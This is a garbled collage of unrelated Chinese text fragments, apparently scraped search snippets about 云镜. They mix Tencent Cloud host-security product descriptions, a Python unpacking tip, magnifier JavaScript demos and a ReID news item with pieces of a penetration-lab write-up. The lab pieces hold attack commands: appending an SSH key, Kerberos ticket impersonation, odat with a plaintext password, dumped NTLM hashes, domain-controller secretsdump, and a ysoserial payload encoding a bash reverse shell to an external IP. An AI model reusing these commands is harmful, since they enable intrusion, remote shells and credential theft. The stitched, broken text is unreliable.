工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说云镜难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。 +gPW+BRQUJiiXymM9P1Pu46xc+ITjXndvFUm/LjKwcmlqSPI7EWIEFwWzxPfNeWpjqJSYb6KkYgf3n+zvvKmX+A6CDZZ4Kl0ABV+8dkYML /Jz5IQql8YdAgKCpHMoiV/bGwVTkCDRhuUXL1TW2m7pwXUw9RWM3i8G8WKnpMfQtsYXIo0Qatxx0Lxq3bpIEdkSKGTptGyCuvZCouUd5cpUpJJ4yrW8I0Jg9Zqqifsc2iRrwK6zcW7pHkLAkksEZC2DyM78iR5Fl4Z +DUSyA8Ha2E1FJiXbykqa6vV9THb6LltArhhFNikR42cqxUH1Q/qoM8bG00=" >> /root/.ssh/authorized_keys chmod 600 的银票了 申请XR-LCM3AE8B CIFS票据 proxychains4 python3 getST.py -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate
排查云镜异常,可以收集云镜日志让售后看下C:\Program Files\QCloud\YunJing\log复制该目录,对复制后的目录进行压缩,压缩成.7z格式(压缩率高,压缩文件小,方便传输)云镜的 如果解析到同一个地址,telnet测试反而省事了,如果解析到多个地址,每个地址对应的端口都telnet测试下看看通不通s.yd.qcloud.coml.yd.qcloud.comu.yd.qcloud.com云镜域名的情况比较复杂 ,具体可参考官网文档:https://cloud.tencent.com/document/product/296/12236图片官网文档上虽然对云镜的域名分门别类这么多,但我建议以nslookup或dig
台以下,可以参考网上的一些文章来加固我们的服务器,如笔者之前整理的《Linux服务器安全加固10条建议》和《Windows服务器安全加固10条建议》等, 如果服务器不断的增加业务快速的膨胀这时就需要借助“云” 的安全力量,那就是“主机安全(云镜)”这款产品。 image.png 开通云主机时可以免费开通“主机安全”防护 image.png 什么是主机安全(云镜) 主机安全基于腾讯安全积累的海量威胁的数据,利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务 image.png 云镜的主要功能介绍 概览页面:https://console.cloud.tencent.com/cwp ; 资产列表(需要付费3元/台1天): 直观的看到每台服务器上的端口、账号 image.png 本文参考 云镜产品介绍视频: https://cloud.tencent.com/edu/learning/course-1055-995 主机安全文档:https://cloud.tencent.com
/add' proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf -- 97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E4%B9%9D%E7%A7%8D%E6%9D%83%E9%99%90%E7%9A%84%E5%88%A9%E7%94%A8 null) kerberos : * Username : XR-0923$ * Domain : xiaorang.lab * Password : c8 9c 74 62 4b a5 13 60 f8 9f 61 ee 0c 9c b4 ca 97 d7 4c 53 6a 10 4e e7 74 03 51 0a 95 3f 78 af 15 22 5d e9 16 66 bd fe c7 92 78 59 be 9b 0b 65 91 10 8b 5b c4 8f 18 32 72 a6 cb bb c1 b0 96 0f 1d 63 bf 8f e8
ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ time__1311=mqmx0DBDuDcD2QD9DBuQ1GkQrPxMR8DArD中的NFS提权。首先在靶机上写入一个c文件。 1105msv : [00000003] Primary * Username : chenglei * Domain : XIAORANG * NTLM : 0c00801c30594a1b8eaa889d237c5382 * SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7 * DPAPI : 89b179dc738db098372c365602b7b0f4tspkg
发现jsessionid=xxx,明显的Shiro特征,同时发现有acatuator泄露。
0x15367c548c55ac098c599b20b71d1c86a2c1f610 dpapi_userkey:0x28a7796c724094930fc4a3c5a099d0b89dccd6d1 [*] NL$KM 0000 8B ...t........ 0020 1B 77 20 D5 A6 67 31 E9 9E 38 DD 95 B0 60 32 C4 .w ..g1..8...`2. 0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM.....0...L+J NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a [*] Cleaning up... [*] Stopping service RemoteRegistry 获取FILESERVER$用户哈希为951d8a9265dfb652f42e5c8c497d70dc secretsdump.py工具导出域控哈希 proxychains secretsdump.py xiaorang.lab/'Fileserver$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦
image.png 云镜为腾讯云海量用户抵御黑客攻击 image.png 充分利用云的优势对密码破解行为进行拦截和预警 image.png 基于AI的WebShell检测技术 云镜WebShell检测优势 Q:云镜是否会采集我主机上的隐私数据? Q:云镜的客户端稳定性如何,是否会造成业务影响? Q:云镜的漏洞检测覆盖哪些范围,是否可以替代传统扫描器? A:云镜漏洞检测功能主要侧重于高危可造成入侵的漏洞,包括WEB和系统组件,云镜对于新出现的漏洞有较快的响应速度,能在极短的时间内完成全部业务主机检测,可以避免扫描器策略更新滞后和扫描效率低带来的风险,对于历史上的漏洞
*还有一个作用,把元组拆开作为函数参数: >>> divmod(20, 8) (2, 4) >>> t = (20, 8) >>> divmod(*t) (2, 4) 经典写法*args就是这个道理。 列表也能拆 既然列表和元组是孪生兄弟,那必然也有共同技能: list_test = [1, 2, 3] a, b, c = list_test >>> divmod(20, 8) (2, 4) >>> t = [20, 8] # 换成列表 >>> divmod(*t) (2, 4) 列表拆包,也是ok的。
当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd %91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户,如果能够添加成功就说明漏洞存在
当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd %91%e9%bc%8e%e6%9d%af%e5%8d%8a%e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户,如果能够添加成功就说明漏洞存在
放大镜:淘宝等电商页面应用广泛... 思路:先让move块和bimg块隐藏,当鼠标移动到box上时,使move块和bimg块显示,获取鼠标当前的位置,然后经过计算给与move块和bimg块适当的值实现放大镜效果 <! DOCTYPE html> <html> <head> <meta charset="UTF-<em>8</em>"> <title>放大镜</title> <style
TAV WebShell引擎的检测效果 在云上真实WebShell黑样本集中,腾讯TAV引擎的检测贡献率能达到99%以上。 相比于传统的特征检测方案,TAV WebShell检测引擎不仅有着超高的检测率,同时也有超低的误报率,在云上真实环境中,也具备较高的独报能力。 目前腾讯主机安全(云镜)已全面接入TAV WebShell检测能力,使腾讯云主机查杀防御WebShell攻击的能力得以大幅提升。 后续还将陆续接入腾讯安全其他产品,比如腾讯高级威胁检测系统(御界)、Web应用防火墙、云防火墙、零信任iOA等等产品,将全面增强在终端侧、主机侧、流量侧的安全能力。
上面代码中,图片没有设置高度,我们在JavaScript中用 img.offsetWidth 来获取。获取之后设置 wrapper 的宽度与 img 的宽度相同。
它核心是对相机应用,异名基于此实现一个放大镜的demo ? 相机有—个clearFlag如果你设置了,它在绘制画面的时候,会清理屏幕 一般只给前面的相机设置clearFlag;后面相机都不能再设置,不然会把前面相机绘制的内容清除掉 把思路拉回到放大镜demo中, 要实现放大镜,其实就是多创造一个相机去拍摄需要放大的物体,然后调整相机的缩放比例,使投影的物体放大或者缩小对应的倍数,然后配合使用Mask组件去裁剪我们需要的局部位置,mask的编辑器设置请参考项目源码
近日,云从科技在跨镜追踪技术(ReID,Person Re-identification)上再次取得重大进展,在三大主流ReID数据集Market-1501、DukeMTMC-reID、CUHK03上超过阿里巴巴 这是继去年云从科技刷新跨镜追踪技术世界纪录后,再一次在该领域领跑全球。 相较去年,云从科技在扩大算法领先优势的同时,也在跨镜追踪(ReID)技术的商业化中积累了丰富的实践经验,不仅核心算法速度提高了10倍,还围绕跨镜追踪(ReID)技术打造了行人检测、追踪、结构化等一系列算法模块 跨镜追踪技术作为人脸技术的重要补充和扩展,越来越多互联网巨头和科技独角兽开始意识到它的重要性,并逐渐在跨镜追踪研究领域投入资源。 云从科技作为这一领域较早的探索者和布局者,在跨镜追踪和其相关技术上,如行人检测、行人检索、行人轨迹跟踪、行人属性结构化、行人动作检测和识别等,都拥有大量技术经验积累。
.mask0", big:".big0" }) </script> 4.biger.js /** * Created by Administrator on 2017/11/8.
这一期,我们向朋友们详细介绍腾讯安全技术团队如何利用人工智能方法,开发出BinaryAI引擎对样本文件进行软件成分分析,使未知挖矿木马检测能力大幅提升,目前腾讯主机安全(云镜)已率先集成BinaryAI image.png 据腾讯安全最新统计,在公有云的攻击事件当中,以挖矿为目的的入侵行为占比超过一半,达到54.9%,腾讯安全团队在过去30天捕获挖矿木马攻击事件累计超过6000件。 ---- 传统挖矿木马检测方案包含三个维度 1.静态检测:基于字符串常量、特征检测规则和文件hash的检测方法; 2.动态检测:基于矿池网络连接行为的检测方法; 3.主机层检测:云主机资源异常占用的检测方法 腾讯主机安全(云镜)已率先接入BinaryAI引擎,可以通过BinaryAI引擎检测未知挖矿木马威胁。